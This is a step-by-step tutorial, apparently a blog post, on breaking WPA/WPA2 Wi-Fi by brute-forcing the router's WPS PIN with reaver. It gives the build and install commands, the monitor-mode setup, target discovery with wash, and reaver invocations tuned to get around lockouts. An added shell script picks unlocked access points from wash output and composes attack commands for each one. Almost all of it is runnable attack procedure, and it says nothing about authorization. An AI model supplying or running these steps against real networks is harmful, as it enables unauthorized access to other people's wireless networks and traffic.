WPA and WPA2 networks can be broken in under 10 hours, regardless of how strong the passphrase is, provided WPS (Wi-Fi Protected Setup) PIN authentication is enabled on the router. The attack does not crack WPA itself: it brute-forces the 8-digit WPS PIN, and once the PIN is known the AP hands over the WPA/WPA2 PSK. Because the AP confirms the first four digits and the last four digits of the PIN separately, and the eighth digit is a checksum of the other seven, at most 10,000 + 1,000 = 11,000 guesses are needed instead of 10^8. The software we'll use is reaver.
The hardware I'm using is an Intel(R) PRO/Wireless 3945ABG/BG on Ubuntu 11.04 and the driver is iwl3945.
First, install the libraries and build tools needed to compile reaver. Run the following command in a terminal:
sudo apt-get install libsqlite3-dev libpcap0.8-dev build-essential
Now, in the terminal, change into the /tmp directory: cd /tmp
Download reaver by running wget -c 'http://code.google.com/p/reaver-wps/downloads/detail?name=reaver-1.4.tar.gz&can=2&q=' (the URL must be quoted, otherwise the shell treats each & as a command separator). Before going on, check that what landed in /tmp is the tarball reaver-1.4.tar.gz and not an HTML download page; file reaver-1.4.tar.gz should report gzip compressed data.
Now extract it by running tar xf reaver-1.4.tar.gz
Now run the following commands to compile and install the software (the build files live in the src directory of the extracted archive):
cd reaver-1.4/src
./configure
make
sudo make install
After this reaver will be installed on your system.
Now let's install aircrack-ng (optional). We won't use aircrack-ng itself to crack anything, but its airmon-ng tool is a convenient way to put the card into monitor mode. You can install it by running:
sudo apt-get install aircrack-ng
Now comes the attacking part.
First of all we have to enable monitor mode on our wireless interface. To do so run sudo airmon-ng start wlan0 . This creates a new interface mon0 (the name differs with other drivers, e.g. ath0) with monitor mode enabled.
You can also put the interface into monitor mode by hand, in which case aircrack-ng is not required. Note that ifconfig alone cannot change the mode; you need iwconfig as well: sudo ifconfig wlan0 down; sudo iwconfig wlan0 mode monitor; sudo ifconfig wlan0 up. Then use wlan0 instead of mon0 in the commands below.
Now let's check if the AP has WPS support. Run the command sudo wash -i mon0 --ignore-fcs
If the AP doesn't support WPS it won't be listed here. If it is listed, the AP supports WPS; also look at the "WPS Locked" column, because an AP that reports Yes there is currently rejecting PIN attempts and reaver will only stall on it. Note the channel and BSSID of the AP you want.
Now let's run the reaver command: sudo reaver -i mon0 -b bssid-you-noted-above -vv -c channel-you-noted-above --no-nacks
Reaver will now brute-force the WPS PIN, guessing the first four digits and then the last three separately (the eighth digit is the checksum), and once the PIN is found the AP returns the WPA/WPA2 PSK. Against an AP that keeps accepting attempts this typically finishes in under 10 hours. Many APs lock WPS for a while after a run of failed PINs, which reaver reports as a "Detected AP rate limiting" warning; its --delay and --lock-delay options pace the attempts for such APs, and --dh-small speeds up each exchange.
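As an added example (not part of the original post and not code from the reaver project), the following shell script shows the two pieces of arithmetic the attack relies on, the WPS PIN checksum and the split-half PIN space, and then picks unlocked targets from wash output and composes the matching reaver command line. The wash table below is a constructed sample modelled on the columns wash prints (BSSID, Channel, RSSI, WPS Version, WPS Locked, ESSID); the addresses and network names are made up. The -d and -l options are reaver's delay and lock-delay settings, which the post's own command does not use.

```shell
#!/bin/sh
# Added example, not from the original post or from reaver.

# WPS PIN checksum: the seven leading digits are weighted 3,1,3,1,3,1,3
# and the eighth digit makes the weighted sum a multiple of 10. This is
# why only 1,000 of the 10,000 possible second halves are worth trying.
wps_checksum() {
    seven=$1            # seven-digit string, leading zeros allowed
    accum=0
    i=1
    while [ "$i" -le 7 ]; do
        d=$(printf '%s' "$seven" | cut -c "$i")
        if [ $((i % 2)) -eq 1 ]; then
            accum=$((accum + 3 * d))
        else
            accum=$((accum + d))
        fi
        i=$((i + 1))
    done
    echo $(( (10 - accum % 10) % 10 ))
}

# Assemble a full 8-digit PIN from the two halves the AP confirms
# separately: a 4-digit first half (10,000 candidates) and a 3-digit
# second half (1,000 candidates, the checksum fixes the last digit).
# 10,000 + 1,000 = 11,000 attempts in the worst case, not 10^8.
wps_full_pin() {
    first=$1    # 4 digits
    second=$2   # 3 digits
    seven="${first}${second}"
    printf '%s%s\n' "$seven" "$(wps_checksum "$seven")"
}

# Constructed sample of a wash table; BSSIDs and ESSIDs are invented.
SAMPLE_WASH_OUTPUT='BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
00:11:22:33:44:55       6            -61        1.0               No                HomeNet
66:77:88:99:AA:BB       11           -70        1.0               Yes               Office AP
CC:DD:EE:FF:00:11       1            -55        1.0               No                Guest WiFi'

# Read a wash table on stdin and print "BSSID channel" for every AP whose
# WPS Locked column is No. Locked APs refuse PIN attempts, so reaver
# would only stall on them. The first two lines are the header and rule.
wps_unlocked_targets() {
    awk 'NR > 2 && $5 == "No" { print $1, $2 }'
}

# Compose the reaver command for one target: -vv verbose, --no-nacks as
# in the post, -d (delay between attempts) and -l (back-off after the AP
# reports a lockout) to cope with rate limiting. Printed rather than
# executed so the operator can review it before launching.
reaver_cmd() {
    iface=$1; bssid=$2; chan=$3
    printf 'sudo reaver -i %s -b %s -c %s -vv --no-nacks -d 1 -l 300\n' \
        "$iface" "$bssid" "$chan"
}

# Usage: list the reaver command for every unlocked AP in the sample.
printf '%s\n' "$SAMPLE_WASH_OUTPUT" | wps_unlocked_targets |
while read -r bssid chan; do
    reaver_cmd mon0 "$bssid" "$chan"
done
```

The checksum function reproduces the well-known default PIN 12345670 (first half 1234, second half 567, checksum 0), which is a quick sanity check before trusting any PIN list fed to reaver.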